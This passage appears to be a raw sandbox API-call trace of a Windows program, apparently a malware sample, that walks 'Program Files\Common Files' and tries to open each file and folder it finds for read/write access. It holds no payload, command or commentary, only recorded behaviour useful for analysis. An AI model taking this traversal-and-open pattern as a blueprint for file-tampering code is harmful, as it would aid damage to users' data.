dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0073.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0073.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0073.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0073.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0073.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0073.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0073.862] AreFileApisANSI () returned 1 [0073.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\far.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\far.exe", lpUsedDefaultChar=0x0) returned 38 [0073.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0073.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0073.862] AreFileApisANSI () returned 1 [0073.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0073.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d160 [0073.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x6d160, cchWideChar=38 | out: lpWideCharStr="C:\\Program Files\\Common Files\\far.exe") returned 38 [0073.862] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\far.exe" (normalized: "c:\\program files\\common files\\far.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0073.862] GetFileType (hFile=0x420) returned 0x1 [0073.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0073.863] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0073.863] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0073.863] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0073.863] CloseHandle (hObject=0x420) returned 1 [0073.863] AreFileApisANSI () returned 1 [0073.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0073.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d1b8 [0073.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x6d1b8, cchWideChar=38 | out: lpWideCharStr="C:\\Program Files\\Common Files\\far.exe") returned 38 [0073.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\far.exe" (normalized: "c:\\program files\\common files\\far.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.864] GetLastError () returned 0x20 [0073.864] GetLastError () returned 0x20 [0073.864] SetLastError (dwErrCode=0x20) [0073.864] GetLastError () returned 0x20 [0073.864] SetLastError (dwErrCode=0x20) [0073.864] GetLastError () returned 0x20 [0073.864] SetLastError (dwErrCode=0x20) [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0073.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.864] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0073.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0073.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0073.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0073.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0073.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.865] AreFileApisANSI () returned 1 [0073.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared", lpUsedDefaultChar=0x0) returned 47 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0073.865] AreFileApisANSI () returned 1 [0073.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0073.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared") returned 47 [0073.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared" (normalized: "c:\\program files\\common files\\microsoft shared"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.866] GetLastError () returned 0x5 [0073.866] GetLastError () returned 0x5 [0073.866] SetLastError (dwErrCode=0x5) [0073.866] GetLastError () returned 0x5 [0073.866] SetLastError (dwErrCode=0x5) [0073.866] GetLastError () returned 0x5 [0073.866] SetLastError (dwErrCode=0x5) [0073.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0073.866] AreFileApisANSI () returned 1 [0073.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0073.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared") returned 47 [0073.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared" (normalized: "c:\\program files\\common files\\microsoft shared"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.866] GetLastError () returned 0x5 [0073.866] GetLastError () returned 0x5 [0073.866] SetLastError (dwErrCode=0x5) [0073.866] GetLastError () returned 0x5 [0073.866] SetLastError (dwErrCode=0x5) [0073.866] GetLastError () returned 0x5 [0073.866] SetLastError (dwErrCode=0x5) [0073.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0073.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0073.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.867] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf83ff0b0, ftCreationTime.dwHighDateTime=0x1d57485, ftLastAccessTime.dwLowDateTime=0x57fc1340, ftLastAccessTime.dwHighDateTime=0x1d592a3, ftLastWriteTime.dwLowDateTime=0x57fc1340, ftLastWriteTime.dwHighDateTime=0x1d592a3, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="omnipos.exe", cAlternateFileName="")) returned 1 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0073.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0073.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0073.867] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0073.867] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.868] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0073.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0073.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0073.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.869] AreFileApisANSI () returned 1 [0073.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun", lpUsedDefaultChar=0x0) returned 58 [0073.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0073.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0073.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0073.869] AreFileApisANSI () returned 1 [0073.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0073.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a630 [0073.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 58 [0073.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.869] GetLastError () returned 0x5 [0073.869] GetLastError () returned 0x5 [0073.869] SetLastError (dwErrCode=0x5) [0073.869] GetLastError () returned 0x5 [0073.869] SetLastError (dwErrCode=0x5) [0073.869] GetLastError () returned 0x5 [0073.869] SetLastError (dwErrCode=0x5) [0073.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0073.870] AreFileApisANSI () returned 1 [0073.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0073.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0073.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 58 [0073.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.870] GetLastError () returned 0x5 [0073.870] GetLastError () returned 0x5 [0073.870] SetLastError (dwErrCode=0x5) [0073.870] GetLastError () returned 0x5 [0073.870] SetLastError (dwErrCode=0x5) [0073.870] GetLastError () returned 0x5 [0073.870] SetLastError (dwErrCode=0x5) 